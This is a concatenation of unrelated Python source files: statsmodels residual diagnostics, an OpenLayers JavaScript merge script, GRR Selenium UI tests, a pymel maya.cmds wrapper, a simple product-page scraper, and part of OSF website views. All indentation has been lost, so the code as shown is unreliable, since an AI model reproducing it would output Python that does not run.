treated as being zero. If None, the conditional means are
estimated.
Returns
-------
An array containing the CERES residuals.
Notes
-----
If `cond_means` is not provided, it is obtained by smoothing each
column of exog (except the focus column) against the focus column.
Currently only supports GLM, GEE, and OLS models.
"""
model = results.model
if not isinstance(model, (GLM, GEE, OLS)):
raise ValueError("ceres residuals not available for %s" %
model.__class__.__name__)
focus_exog, focus_col = utils.maybe_name_or_idx(focus_exog, model)
# Indices of non-focus columns
ix_nf = range(len(results.params))
ix_nf = list(ix_nf)
ix_nf.pop(focus_col)
nnf = len(ix_nf)
# Estimate the conditional means if not provided.
if cond_means is None:
# Below we calculate E[x | focus] where x is each column other
# than the focus column. We don't want the intercept when we do
# this so we remove it here.
pexog = model.exog[:, ix_nf]
pexog -= pexog.mean(0)
u, s, vt = np.linalg.svd(pexog, 0)
ii = np.flatnonzero(s > 1e-6)
pexog = u[:, ii]
fcol = model.exog[:, focus_col]
cond_means = np.empty((len(fcol), pexog.shape[1]))
for j in range(pexog.shape[1]):
# Get the fitted values for column i given the other
# columns (skip the intercept).
y0 = pexog[:, j]
cf = lowess(y0, fcol, frac=frac, return_sorted=False)
cond_means[:, j] = cf
new_exog = np.concatenate((model.exog[:, ix_nf], cond_means), axis=1)
# Refit the model using the adjusted exog values
klass = model.__class__
init_kwargs = model._get_init_kwds()
new_model = klass(model.endog, new_exog, **init_kwargs)
new_result = new_model.fit()
# The partial residual, with respect to l(x2) (notation of Cook 1998)
presid = model.endog - new_result.fittedvalues
if isinstance(model, (GLM, GEE)):
presid *= model.family.link.deriv(new_result.fittedvalues)
if new_exog.shape[1] > nnf:
presid += np.dot(new_exog[:, nnf:], new_result.params[nnf:])
return presid
def partial_resids(results, focus_exog):
"""
Returns partial residuals for a fitted model with respect to a
'focus predictor'.
Parameters
----------
results : results instance
A fitted regression model.
focus col : int
The column index of model.exog with respect to which the
partial residuals are calculated.
Returns
-------
An array of partial residuals.
References
----------
RD Cook and R Croos-Dabrera (1998). Partial residual plots in
generalized linear models. Journal of the American Statistical
Association, 93:442.
"""
# TODO: could be a method of results
# TODO: see Cook et al (1998) for a more general definition
# The calculation follows equation (8) from Cook's paper.
model = results.model
resid = model.endog - results.predict()
if isinstance(model, (GLM, GEE)):
resid *= model.family.link.deriv(results.fittedvalues)
elif isinstance(model, (OLS, GLS, WLS)):
pass # No need to do anything
else:
raise ValueError("Partial residuals for '%s' not implemented."
% type(model))
if type(focus_exog) is str:
focus_col = model.exog_names.index(focus_exog)
else:
focus_col = focus_exog
focus_val = results.params[focus_col] * model.exog[:, focus_col]
return focus_val + resid
def added_variable_resids(results, focus_exog, resid_type=None,
use_glm_weights=True, fit_kwargs=None):
"""
Residualize the endog variable and a 'focus' exog variable in a
regression model with respect to the other exog variables.
Parameters
----------
results : regression results instance
A fitted model including the focus exog and all other
predictors of interest.
focus_exog : integer or string
The column of results.model.exog or a variable name that is
to be residualized against the other predictors.
resid_type : string
The type of residuals to use for the dependent variable. If
None, uses `resid_deviance` for GLM/GEE and `resid` otherwise.
use_glm_weights : bool
Only used if the model is a GLM or GEE. If True, the
residuals for the focus predictor are computed using WLS, with
the weights obtained from the IRLS calculations for fitting
the GLM. If False, unweighted regression is used.
fit_kwargs : dict, optional
Keyword arguments to be passed to fit when refitting the
model.
Returns
-------
endog_resid : array-like
The residuals for the original exog
focus_exog_resid : array-like
The residuals for the focus predictor
Notes
-----
The 'focus variable' residuals are always obtained using linear
regression.
Currently only GLM, GEE, and OLS models are supported.
"""
model = results.model
if not isinstance(model, (GEE, GLM, OLS)):
raise ValueError("model type %s not supported for added variable residuals" %
model.__class__.__name__)
exog = model.exog
endog = model.endog
focus_exog, focus_col = utils.maybe_name_or_idx(focus_exog, model)
focus_exog_vals = exog[:, focus_col]
# Default residuals
if resid_type is None:
if isinstance(model, (GEE, GLM)):
resid_type = "resid_deviance"
else:
resid_type = "resid"
ii = range(exog.shape[1])
ii = list(ii)
ii.pop(focus_col)
reduced_exog = exog[:, ii]
start_params = results.params[ii]
klass = model.__class__
kwargs = model._get_init_kwds()
new_model = klass(endog, reduced_exog, **kwargs)
args = {"start_params": start_params}
if fit_kwargs is not None:
args.update(fit_kwargs)
new_result = new_model.fit(**args)
if not new_result.converged:
raise ValueError("fit did not converge when calculating added variable residuals")
try:
endog_resid = getattr(new_result, resid_type)
except AttributeError:
raise ValueError("'%s' residual type not available" % resid_type)
import statsmodels.regression.linear_model as lm
if isinstance(model, (GLM, GEE)) and use_glm_weights:
weights = model.family.weights(results.fittedvalues)
if hasattr(model, "data_weights"):
weights = weights * model.data_weights
lm_results = lm.WLS(focus_exog_vals, reduced_exog, weights).fit()
else:
lm_results = lm.OLS(focus_exog_vals, reduced_exog).fit()
focus_exog_resid = lm_results.resid
return endog_resid, focus_exog_resid
| |
#!/usr/bin/env python
#
# Merge multiple JavaScript source code files into one.
#
# Usage:
# This script requires source files to have dependencies specified in them.
#
# Dependencies are specified with a comment of the form:
#
# // @requires <file path>
#
# e.g.
#
# // @requires Geo/DataSource.js
#
# This script should be executed like so:
#
# mergejs.py <output.js> <directory> [...]
#
# e.g.
#
# mergejs.py openlayers.js Geo/ CrossBrowser/
#
# This example will cause the script to walk the `Geo` and
# `CrossBrowser` directories--and subdirectories thereof--and import
# all `*.js` files encountered. The dependency declarations will be extracted
# and then the source code from imported files will be output to
# a file named `openlayers.js` in an order which fulfils the dependencies
# specified.
#
#
# Note: This is a very rough initial version of this code.
#
# -- Copyright 2005-2011 OpenLayers contributors / OpenLayers project --
#
# TODO: Allow files to be excluded. e.g. `Crossbrowser/DebugMode.js`?
# TODO: Report error when dependency can not be found rather than KeyError.
import re
import os
import sys
SUFFIX_JAVASCRIPT = ".js"
RE_REQUIRE = "@requires:? (.*)\n" # TODO: Ensure in comment?
class MissingImport(Exception):
"""Exception raised when a listed import is not found in the lib."""
class SourceFile:
"""
Represents a Javascript source code file.
"""
def __init__(self, filepath, source):
"""
"""
self.filepath = filepath
self.source = source
self.requiredBy = []
def _getRequirements(self):
"""
Extracts the dependencies specified in the source code and returns
a list of them.
"""
# TODO: Cache?
return re.findall(RE_REQUIRE, self.source)
requires = property(fget=_getRequirements, doc="")
def usage(filename):
"""
Displays a usage message.
"""
print "%s [-c <config file>] <output.js> <directory> [...]" % filename
class Config:
"""
Represents a parsed configuration file.
A configuration file should be of the following form:
[first]
3rd/prototype.js
core/application.js
core/params.js
# A comment
[last]
core/api.js # Another comment
[exclude]
3rd/logger.js
exclude/this/dir
All headings are required.
The files listed in the `first` section will be forced to load
*before* all other files (in the order listed). The files in `last`
section will be forced to load *after* all the other files (in the
order listed).
The files list in the `exclude` section will not be imported.
Any text appearing after a # symbol indicates a comment.
"""
def __init__(self, filename):
"""
Parses the content of the named file and stores the values.
"""
lines = [re.sub("#.*?$", "", line).strip() # Assumes end-of-line character is present
for line in open(filename)
if line.strip() and not line.strip().startswith("#")] # Skip blank lines and comments
self.forceFirst = lines[lines.index("[first]") + 1:lines.index("[last]")]
self.forceLast = lines[lines.index("[last]") + 1:lines.index("[include]")]
self.include = lines[lines.index("[include]") + 1:lines.index("[exclude]")]
self.exclude = lines[lines.index("[exclude]") + 1:]
def undesired(filepath, excludes):
# exclude file if listed
exclude = filepath in excludes
if not exclude:
# check if directory is listed
for excludepath in excludes:
if not excludepath.endswith("/"):
excludepath += "/"
if filepath.startswith(excludepath):
exclude = True
break
return exclude
def run (sourceDirectory, outputFilename = None, configFile = None):
cfg = None
if configFile:
cfg = Config(configFile)
allFiles = []
## Find all the Javascript source files
for root, dirs, files in os.walk(sourceDirectory):
for filename in files:
if filename.endswith(SUFFIX_JAVASCRIPT) and not filename.startswith("."):
filepath = os.path.join(root, filename)[len(sourceDirectory)+1:]
filepath = filepath.replace("\\", "/")
if cfg and cfg.include:
if filepath in cfg.include or filepath in cfg.forceFirst:
allFiles.append(filepath)
elif (not cfg) or (not undesired(filepath, cfg.exclude)):
allFiles.append(filepath)
## Header inserted at the start of each file in the output
HEADER = "/* " + "=" * 70 + "\n %s\n" + " " + "=" * 70 + " */\n\n"
files = {}
## Import file source code
## TODO: Do import when we walk the directories above?
for filepath in allFiles:
print "Importing: %s" % filepath
fullpath = os.path.join(sourceDirectory, filepath).strip()
content = open(fullpath, "U").read() # TODO: Ensure end of line @ EOF?
files[filepath] = SourceFile(filepath, content) # TODO: Chop path?
print
from toposort import toposort
complete = False
resolution_pass = 1
while not complete:
complete = True
## Resolve the dependencies
print "Resolution pass %s... " % resolution_pass
resolution_pass += 1
for filepath, info in files.items():
for path in info.requires:
if not files.has_key(path):
complete = False
fullpath = os.path.join(sourceDirectory, path).strip()
if os.path.exists(fullpath):
print "Importing: %s" % path
content = open(fullpath, "U").read() # TODO: Ensure end of line @ EOF?
files[path] = SourceFile(path, content) # TODO: Chop path?
else:
raise MissingImport("File '%s' not found (required by '%s')." % (path, filepath))
# create dictionary of dependencies
dependencies = {}
for filepath, info in files.items():
dependencies[filepath] = info.requires
print "Sorting..."
order = toposort(dependencies) #[x for x in toposort(dependencies)]
## Move forced first and last files to the required position
if cfg:
print "Re-ordering files..."
order = cfg.forceFirst + [item
for item in order
if ((item not in cfg.forceFirst) and
(item not in cfg.forceLast))] + cfg.forceLast
print
## Output the files in the determined order
result = []
for fp in order:
f = files[fp]
print "Exporting: ", f.filepath
result.append(HEADER % f.filepath)
source = f.source
result.append(source)
if not source.endswith("\n"):
result.append("\n")
print "\nTotal files merged: %d " % len(files)
if outputFilename:
print "\nGenerating: %s" % (outputFilename)
open(outputFilename, "w").write("".join(result))
return "".join(result)
if __name__ == "__main__":
import getopt
options, args = getopt.getopt(sys.argv[1:], "-c:")
try:
outputFilename = args[0]
except IndexError:
usage(sys.argv[0])
raise SystemExit
else:
sourceDirectory = args[1]
if not sourceDirectory:
usage(sys.argv[0])
raise SystemExit
configFile = None
if options and options[0][0] == "-c":
configFile = options[0][1]
print "Parsing configuration file: %s" % filename
run( sourceDirectory, outputFilename, configFile )
| |
#!/usr/bin/env python
"""This modules contains tests for Angular components."""
from grr.gui import runtests_test
from grr.lib import aff4
from grr.lib import flags
from grr.lib import rdfvalue
from grr.lib import test_lib
class CollectionTableDirectiveTest(test_lib.GRRSeleniumTest):
"""Test for angular collection table.
NOTE: this class uses CollectionTableTestRenderer defined in
angular_components_testonly.py.
"""
def CreateCollectionWithMessages(self, messages):
with self.ACLChecksDisabled():
with aff4.FACTORY.Create("aff4:/tmp/collection",
aff4_type="RDFValueCollection",
mode="w", token=self.token) as fd:
for message in messages:
fd.Add(rdfvalue.FlowLog(log_message=message))
def CreateCollection(self, num_items):
messages = []
for i in range(num_items):
messages.append("Message %d" % i)
self.CreateCollectionWithMessages(messages)
def testShowsEmptyListWhenCollectionIsNotFound(self):
self.Open("/#main=CollectionTableTestRenderer")
self.WaitUntil(self.IsTextPresent, "No entries")
def testPagingIsDisabledWhenNotEnoughElements(self):
self.CreateCollection(5)
self.Open("/#main=CollectionTableTestRenderer")
for i in range(5):
self.WaitUntil(self.IsTextPresent, "Message %d" % i)
self.WaitUntil(self.IsElementPresent,
"css=grr-collection-table li:contains('Prev').disabled")
self.WaitUntil(self.IsElementPresent,
"css=grr-collection-table li:contains('Next').disabled")
self.WaitUntil(self.IsElementPresent,
"css=grr-collection-table li:contains('1').disabled")
def testPagingWorksCorrectlyFor2Pages(self):
self.CreateCollection(5 * 2)
def CheckThatPrevAndOneAreDisabled():
self.WaitUntil(self.IsElementPresent,
"css=grr-collection-table li:contains('Prev').disabled")
self.WaitUntil(
self.IsElementPresent,
"css=grr-collection-table li:contains('Next'):not(.disabled)")
self.WaitUntil(self.IsElementPresent,
"css=grr-collection-table li:contains('1').disabled")
self.WaitUntil(self.IsElementPresent,
"css=grr-collection-table li:contains('2'):not(.disabled)")
def CheckThatNextAndTwoAreDisabled():
self.WaitUntil(
self.IsElementPresent,
"css=grr-collection-table li:contains('Prev'):not(.disabled)")
self.WaitUntil(self.IsElementPresent,
"css=grr-collection-table li:contains('Next').disabled")
self.WaitUntil(self.IsElementPresent,
"css=grr-collection-table li:contains('1'):not(.disabled)")
self.WaitUntil(self.IsElementPresent,
"css=grr-collection-table li:contains('2').disabled")
def CheckFirstFiveMessagesAreVisible():
for i in range(5):
self.WaitUntil(self.IsTextPresent, "Message %d" % i)
for i in range(5, 10):
self.WaitUntilNot(self.IsTextPresent, "Message %d" % i)
def CheckLastFiveMessageAreVisible():
for i in range(5, 10):
self.WaitUntil(self.IsTextPresent, "Message %d" % i)
for i in range(5):
self.WaitUntilNot(self.IsTextPresent, "Message %d" % i)
self.Open("/#main=CollectionTableTestRenderer")
CheckFirstFiveMessagesAreVisible()
CheckThatPrevAndOneAreDisabled()
self.Click("css=grr-collection-table a:contains('Next')")
CheckLastFiveMessageAreVisible()
CheckThatNextAndTwoAreDisabled()
self.Click("css=grr-collection-table a:contains('Prev')")
CheckFirstFiveMessagesAreVisible()
CheckThatPrevAndOneAreDisabled()
self.Click("css=grr-collection-table a:contains('2')")
CheckLastFiveMessageAreVisible()
CheckThatNextAndTwoAreDisabled()
self.Click("css=grr-collection-table a:contains('1')")
CheckFirstFiveMessagesAreVisible()
CheckThatPrevAndOneAreDisabled()
def testPagingWorksCorrectlyFor15Pages(self):
self.CreateCollection(5 * 15)
self.Open("/#main=CollectionTableTestRenderer")
for i in range(15):
self.Click("css=grr-collection-table a:contains('%d')" % (i + 1))
for j in range(i * 5, i * 5 + 5):
self.WaitUntil(self.IsTextPresent, "Message %d" % j)
if i > 0:
self.WaitUntilNot(self.IsTextPresent, "Message %d" % (i * 5 - 1))
if i < 14:
self.WaitUntilNot(self.IsTextPresent, "Message %d" % (i * 5 + 6))
def testFilterWorksCorrectlyFor5Elements(self):
self.CreateCollectionWithMessages(
["some1", "other1", "other2", "other3", "some2"])
self.Open("/#main=CollectionTableTestRenderer")
self.WaitUntil(self.IsTextPresent, "some1")
self.WaitUntil(self.IsTextPresent, "some2")
self.WaitUntil(self.IsTextPresent, "other1")
self.WaitUntil(self.IsTextPresent, "other2")
self.WaitUntil(self.IsTextPresent, "other3")
self.WaitUntilNot(self.IsTextPresent, "Filtered by")
self.Type("css=grr-collection-table input.search-query",
"some")
self.Click("css=grr-collection-table button:contains('Filter')")
self.WaitUntil(self.IsTextPresent, "some1")
self.WaitUntil(self.IsTextPresent, "some2")
self.WaitUntilNot(self.IsTextPresent, "other1")
self.WaitUntilNot(self.IsTextPresent, "other2")
self.WaitUntilNot(self.IsTextPresent, "other3")
self.WaitUntil(self.IsTextPresent, "Filtered by: some")
self.Type("css=grr-collection-table input.search-query", "")
self.Click("css=grr-collection-table button:contains('Filter')")
self.WaitUntil(self.IsTextPresent, "some1")
self.WaitUntil(self.IsTextPresent, "some2")
self.WaitUntil(self.IsTextPresent, "other1")
self.WaitUntil(self.IsTextPresent, "other2")
self.WaitUntil(self.IsTextPresent, "other3")
self.WaitUntilNot(self.IsTextPresent, "Filtered by")
def testFilterShowsFetchMoreButtonForMoreThanOnePageOfFilteredResults(self):
self.CreateCollectionWithMessages(
["some1", "some2", "some3", "some4", "some5", "some6",
"other1", "other2", "other3", "other4"])
self.Open("/#main=CollectionTableTestRenderer")
self.Type("css=grr-collection-table input.search-query",
"some")
self.Click("css=grr-collection-table button:contains('Filter')")
self.WaitUntil(self.IsTextPresent, "some1")
self.WaitUntil(self.IsTextPresent, "some5")
self.WaitUntilNot(self.IsTextPresent, "some6")
self.Click("css=grr-collection-table button:contains('Fetch More')")
self.WaitUntil(self.IsTextPresent, "some6")
def testFetchAllButtonFetchesAllFilteredResults(self):
messages = []
for i in range(20):
messages.append("some%d" % i)
for i in range(100):
messages.append("other%d" % i)
self.CreateCollectionWithMessages(messages)
self.Open("/#main=CollectionTableTestRenderer")
self.Type("css=grr-collection-table input.search-query",
"some")
self.Click("css=grr-collection-table button:contains('Filter')")
self.WaitUntil(self.IsTextPresent, "some0")
self.WaitUntil(self.IsTextPresent, "some4")
self.WaitUntilNot(self.IsTextPresent, "some5")
self.Click("css=grr-collection-table button:contains('Fetch More')")
self.WaitUntil(self.IsTextPresent, "some5")
self.WaitUntil(self.IsTextPresent, "some9")
self.WaitUntilNot(self.IsTextPresent, "some10")
self.Click("css=grr-collection-table button:contains('Fetch More') ~ "
"button[data-toggle=dropdown]")
self.Click("css=grr-collection-table a:contains('Fetch All')")
self.WaitUntil(self.IsTextPresent, "some10")
self.WaitUntil(self.IsTextPresent, "some19")
def main(argv):
# Run the full test suite
runtests_test.SeleniumTestProgram(argv=argv)
if __name__ == "__main__":
flags.StartMain(main)
| |
'''
This module wraps maya.cmds to accept special pymel arguments.
There are a number of pymel objects which must be converted to a "mel-friendly"
representation. For example, in versions prior to 2009, some mel commands (ie, getAttr) which expect
string arguments will simply reject custom classes, even if they have a valid string representation.
Another Example is mel's matrix inputs, which expects a flat list of 16 flaots, while pymel's Matrix has a more typical
4x4 representation.
If you're having compatibility issues with your custom classes when passing them to maya.cmds,
simply add a __melobject__ function that returns a mel-friendly result and pass them to pymel's wrapped commands.
The wrapped commands in this module are the starting point for any other pymel customizations.
'''
import inspect
import sys
import re
import os
import types
import pymel.util as util
import pymel.versions as versions
#import mayautils
import maya.cmds
import warnings
__all__ = ['getMelRepresentation']
_thisModule = sys.modules[__name__]
# In Maya <= 2011, the error would be:
# TypeError: Object foo.bar is invalid
# In Maya 2012, it is:
# ValueError: No object matches name: foo.bar
if versions.current() < versions.v2012:
objectErrorType = TypeError
objectErrorReg = re.compile(',?Object (.*) is invalid,?$')
else:
objectErrorType = ValueError
objectErrorReg = re.compile(',?No object matches name: ,?(.*)$')
def _testDecorator(function):
def newFunc(*args, **kwargs):
print "wrapped function for %s" % function.__name__
return function(*args, **kwargs)
newFunc.__name__ = function.__name__
newFunc.__doc__ = function.__doc__
return newFunc
def getCmdName(inFunc):
'''Use in place of inFunc.__name__ when inFunc could be a maya.cmds cmd
handles stubFuncs
'''
cmdName = inFunc.__name__
if cmdName == 'stubFunc':
sourceFile = inspect.getsourcefile(inFunc)
if (isinstance(sourceFile, basestring) and
os.path.join('maya', 'app', 'commands') in sourceFile):
# Here's where it gets tricky... this is a fairly big hack, highly
# dependent on the exact implementation of maya.app.commands.stubFunc...
freevars = inFunc.func_code.co_freevars
# in python 2.5, tuples don't have index / find methods
if not hasattr(freevars, 'index'):
freevars = list(freevars)
freeVarIndex = freevars.index('command')
if freeVarIndex:
raise ValueError('could not find a command var in %s' % cmdName)
cmdName = inFunc.func_closure[freeVarIndex].cell_contents
return cmdName
def getMelRepresentation(args, recursionLimit=None, maintainDicts=True):
"""Will return a list which contains each element of the iterable 'args' converted to a mel-friendly representation.
:Parameters:
recursionLimit : int or None
If an element of args is itself iterable, recursionLimit specifies the depth to which iterable elements
will recursively search for objects to convert; if ``recursionLimit==0``, only the elements
of args itself will be searched for PyNodes - if it is 1, iterables within args will have getMelRepresentation called
on them, etc. If recursionLimit==None, then there is no limit to recursion depth.
maintainDicts : bool
In general, all iterables will be converted to tuples in the returned copy - however, if maintainDicts==True,
then iterables for which ``util.isMapping()`` returns True will be returned as dicts.
"""
if recursionLimit:
recursionLimit -= 1
if maintainDicts and util.isMapping(args):
newargs = dict(args)
argIterable = args.iteritems()
isList = False
else:
newargs = list(args)
argIterable = enumerate(args)
isList = True
for index, value in argIterable:
try:
newargs[index] = value.__melobject__()
except AttributeError:
if ((not recursionLimit) or recursionLimit >= 0) and util.isIterable(value):
# ...otherwise, recurse if not at recursion limit and it's iterable
newargs[index] = getMelRepresentation(value, recursionLimit, maintainDicts)
if isList:
newargs = tuple(newargs)
return newargs
def addWrappedCmd(cmdname, cmd=None):
if cmd is None:
cmd = getattr(maya.cmds, cmdname)
# if cmd.__name__ == 'dummyFunc': print cmdname
def wrappedCmd(*args, **kwargs):
# we must get the cmd each time, because maya delays loading of functions until they are needed.
# if we don't reload we'll keep the dummyFunc around
new_cmd = getattr(maya.cmds, cmdname)
# print args, kwargs
# convert args to mel-friendly representation
new_args = getMelRepresentation(args)
# flatten list. this is necessary for list of components. see Issue 71. however, be sure that it's not an empty list/tuple
if len(new_args) == 1 and util.isIterable(new_args[0]) and len(new_args[0]): # isinstance( new_args[0], (tuple, list) ):
new_args = new_args[0]
new_kwargs = getMelRepresentation(kwargs)
# print new_args, new_kwargs
try:
res = new_cmd(*new_args, **new_kwargs)
except objectErrorType, e:
m = objectErrorReg.match(str(e))
if m:
import pymel.core.general
obj = m.group(1)
raise pymel.core.general._objectError(obj)
else:
# re-raise error
raise
# when editing, some of maya.cmds functions return empty strings and some return idiotic statements like 'Values Edited'.
# however, for UI's in particular, people use the edit command to get a pymel class for existing objects.
# return None when we get an empty string
try:
if res == '' and kwargs.get('edit', kwargs.get('e', False)):
return None
except AttributeError:
pass
return res
oldname = getattr(cmd, '__name__', None)
if isinstance(oldname, str):
# Don't use cmd.__name__, as this could be 'stubFunc'
newname = getCmdName(cmd)
else:
newname = str(cmdname)
old_code = wrappedCmd.func_code
# want to change the name, not just of the func, but of the underlying
# code object - this makes it much easier to get useful information when
# using cProfile
# unfortunately, this isn't easy - have to get hacky...
# ...we could do it with a big string and exec, but then we'd lose both
# syntax highlighting, and file + lineno info...
new_code = types.CodeType(old_code.co_argcount,
old_code.co_nlocals,
old_code.co_stacksize,
old_code.co_flags,
old_code.co_code,
old_code.co_consts,
old_code.co_names,
old_code.co_varnames,
old_code.co_filename,
str('%s_wrapped' % cmdname), # unicode no good
old_code.co_firstlineno,
old_code.co_lnotab,
old_code.co_freevars,
old_code.co_cellvars)
wrappedCmd = types.FunctionType(new_code,
wrappedCmd.func_globals,
str(newname), # unicode no good
wrappedCmd.func_defaults,
wrappedCmd.func_closure)
wrappedCmd.__doc__ = cmd.__doc__
# for debugging, to make sure commands got wrapped...
#wrappedCmd = _testDecorator(wrappedCmd)
# so that we can identify that this is a wrapped maya command
setattr(_thisModule, cmdname, wrappedCmd)
#globals()[cmdname] = wrappedCmd
def removeWrappedCmd(cmdname):
try:
del cmdname
except NameError:
warnings.warn("%s not found in %s" % (cmdname, __name__))
def addAllWrappedCmds():
for cmdname, cmd in inspect.getmembers(maya.cmds, callable):
addWrappedCmd(cmdname, cmd)
| |
import urllib.request
import json
class WS:
def extract(l_url, m_url=''):
"""
This is a generator.
Its job is to take urls and return their html
data.
The first value is the main url if you need it.
And the second is the products url.
Here if I have product url that looks like this:
/product/tea-bags/
The url is missing its beginning part which look a
little like this: "https://www.teashop.com/"
So we need to give that first part of the url so
it can find the product.
But if it has all its url you don't need to give
the main url, example: "https://www.google.com/gmail/Soul/"
See it has its whole url? we don't need to give any
main url cause of that.
I used a generator so you can save to hard drive as you
proccess the data. Cause otherwise it will be a little
rammy cause it would return lists which would not return
until its finished fishing. Thats alot of data to store
:P
"""
#This for loop compiles the urls so if they need a main
#it adds it to the url so we can go fishing for out data!
temp = []
for x in l_url:
temp.append(m_url+x)
#A is an un needed varible.
#Its used to help tell us how
#many urls have been extracted so far.
a = 0
for x in temp:
print(str(a)+' "'+x+'"')
print()
#This part does all the fishing for us
with urllib.request.urlopen(x) as response:
yield response.read().decode('utf-8')
a += 1
def scratch(urlsearch, template, exc):
"""
Use this function to extract product urls from a page.
First value is the url of the page to search for product
urls. Second is the template, use that to try and get the
urls you want. It must have at least something passed through
or else it wont find any urls! And the last third value is
from left to right what part of the url to not include.
Cause otherwise you can get unwanted wast.
Example:
http://www.google.com/youtube/dave
say we are going through urls and we want the
name of the youtuber but not the google and youtube
part? well we would give a value like "http://www.google.com/youtube/"
and now all that will be returned is dave.
"""
scrapped = []
with urllib.request.urlopen(urlsearch) as response:
with open(template) as file:
for x in WS.int_fil(WS.decripter(response.read().decode('utf-8')),
json.loads(file.read())):
scrapped.append(x)
result =[]
for x in scrapped:
z = len('a href="{}'.format(exc))
a = z
while x[0][a] != '"':
a += 1
result.append(x[0][z:a])
#It deletes all url copys by making a set.
#Then it changes back to a list so its a usable
#format for anyone using it.
return list(set(result))
def int_fil(html, template):
"""
This is a filter to extract the data we want from our
decripted files. Example of input:
print(INT_filter([['p','Hello',0],['h1','World',1],['div','!',2]],
{'filter':[['p',1],['h1',2]]}))
And the output is:
[['p', 'Hello', 0], ['h1', 'World', 1]]
The first value is the data, the second is the filter data.
When you parse data through send a array of arrays that contain
three values. two string and one number. Example:
[
['p', 'hello world', 0],
['h1 style="..."', 'I love you!', 1]
]
"""
#extracted data varible
datafilterd = []
tl = 0
while tl != len(template['filter']):
x = 0
while x != len(html):
#x is the postition in the list(array), [0] is the tag in the list's
#list. And [:len(...)] takes a string slice from the tag so we
#can test to see if it matches the filter
if html[x][0][:len(template['filter'][tl])] == template['filter'][tl]:
datafilterd.append(html[x])
x += 1
tl+= 1
#returns extracted data varible
return datafilterd
def decripter(html):
"""
This is the decripter api
"""
def __INDEX__(html):
"""
The job of this function is to append an
index to the end of each tag.
"""
x = 0
while x != len(html):
html[x].append(x)
x += 1
return html
def __EXTRACT__(html):
"""
The job of the function is to delete
all \n from the HTML string.
"""
data = ''
temp = []
#changes string to list
for x in range(len(html)):
temp.append(html[x])
#deletes all \n from list
x = 0
temp2 = []
while x != len(temp):
if temp[x] != '\n':
temp2.append(temp[x])
x += 1
del x
#changes list back to string
for x in temp2:
data = data + x
#returns string
return data
def __DECRIPT__(html):
"""
This function decriptes HTML to list of lists.
The result is something like this:
[
['h1', 'hello world', 0],
['p style="..."', 'This product is...', 1]
]
"""
line = []
for x in range(len(html)):
#This is the gate. It makes sure we are seeing tags
if html[x:x+2] != '</':
if html[x] == '<':
#grabs tag name
temp = x
while html[temp] != '>':
temp += 1
#Grads tags content. If it sees an ending nested
#tag is will think its done even though is hasn't
#got everything
temp2 = temp
while html[temp2:temp2+2] != '</':
temp2 += 1
#Appends content to line
line.append([html[x+1:temp], html[temp+1:temp2]])
#Returns list of decripted html
return line
return __INDEX__(__DECRIPT__(__EXTRACT__(html)))
if __name__ == '__main__':
x = 0
for html in WS.extract(WS.scratch("http://international.muscletech.com/products/",
"sup.txt",
""),
"http://international.muscletech.com"):
_html = WS.int_fil(WS.decripter(html), {'filter': ["div id=\"mk-text-block-"]})
with open('data/'+str(x), 'w') as f:
_html = json.dumps({'data': _html})
f.write(_html)
x += 1
if not x < 6:
break
| |
# -*- coding: utf-8 -*-
import itertools
import httplib as http
import logging
import math
import os
import urllib
from django.apps import apps
from flask import request, send_from_directory
from framework import utils, sentry
from framework.auth.decorators import must_be_logged_in
from framework.auth.forms import SignInForm, ForgotPasswordForm
from framework.exceptions import HTTPError
from framework.flask import redirect # VOL-aware redirect
from framework.forms import utils as form_utils
from framework.routing import proxy_url
from framework.auth.core import get_current_user_id
from website.institutions.views import serialize_institution
from website.models import Guid
from website.models import Institution, PreprintService
from website.settings import EXTERNAL_EMBER_APPS
from website.util import permissions
logger = logging.getLogger(__name__)
def _render_node(node, auth=None, parent_node=None):
"""
:param node:
:return:
"""
NodeRelation = apps.get_model('osf.NodeRelation')
perm = None
# NOTE: auth.user may be None if viewing public project while not
# logged in
if auth and auth.user and node.get_permissions(auth.user):
perm_list = node.get_permissions(auth.user)
perm = permissions.reduce_permissions(perm_list)
if parent_node:
try:
node_relation = parent_node.node_relations.get(child__id=node.id)
except NodeRelation.DoesNotExist:
primary = False
_id = node._id
else:
primary = not node_relation.is_node_link
_id = node._id if primary else node_relation._id
else:
_id = node._id
primary = True
return {
'title': node.title,
'id': _id,
'url': node.url,
'api_url': node.api_url,
'primary': primary,
'date_modified': utils.iso8601format(node.date_modified),
'category': node.category,
'permissions': perm, # A string, e.g. 'admin', or None,
'archiving': node.archiving,
'is_retracted': node.is_retracted,
'is_registration': node.is_registration,
}
def _render_nodes(nodes, auth=None, show_path=False, parent_node=None):
"""
:param nodes:
:return:
"""
ret = {
'nodes': [
_render_node(node, auth=auth, parent_node=parent_node)
for node in nodes
],
'show_path': show_path
}
return ret
def index():
try: # Check if we're on an institution landing page
#TODO : make this way more robust
institution = Institution.objects.get(domains__contains=[request.host.lower()], is_deleted=False)
inst_dict = serialize_institution(institution)
inst_dict.update({
'home': False,
'institution': True,
'redirect_url': '/institutions/{}/'.format(institution._id),
})
return inst_dict
except Institution.DoesNotExist:
pass
user_id = get_current_user_id()
if user_id: # Logged in: return either landing page or user home page
all_institutions = Institution.objects.filter(is_deleted=False).order_by('name').only('_id', 'name', 'logo_name')
dashboard_institutions = [
{'id': inst._id, 'name': inst.name, 'logo_path': inst.logo_path_rounded_corners}
for inst in all_institutions
]
return {
'home': True,
'dashboard_institutions': dashboard_institutions,
}
else: # Logged out: return landing page
return {
'home': True,
}
def find_bookmark_collection(user):
Collection = apps.get_model('osf.Collection')
return Collection.objects.get(creator=user, is_deleted=False, is_bookmark_collection=True)
@must_be_logged_in
def dashboard(auth):
return redirect('/')
@must_be_logged_in
def my_projects(auth):
user = auth.user
bookmark_collection = find_bookmark_collection(user)
my_projects_id = bookmark_collection._id
return {'addons_enabled': user.get_addon_names(),
'dashboard_id': my_projects_id,
}
def validate_page_num(page, pages):
if page < 0 or (pages and page >= pages):
raise HTTPError(http.BAD_REQUEST, data=dict(
message_long='Invalid value for "page".'
))
def paginate(items, total, page, size):
pages = math.ceil(total / float(size))
validate_page_num(page, pages)
start = page * size
paginated_items = itertools.islice(items, start, start + size)
return paginated_items, pages
def reproducibility():
return redirect('/ezcuj/wiki')
def signin_form():
return form_utils.jsonify(SignInForm())
def forgot_password_form():
return form_utils.jsonify(ForgotPasswordForm(prefix='forgot_password'))
# GUID ###
def _build_guid_url(base, suffix=None):
url = '/'.join([
each.strip('/') for each in [base, suffix]
if each
])
if not isinstance(url, unicode):
url = url.decode('utf-8')
return u'/{0}/'.format(url)
def resolve_guid(guid, suffix=None):
"""Load GUID by primary key, look up the corresponding view function in the
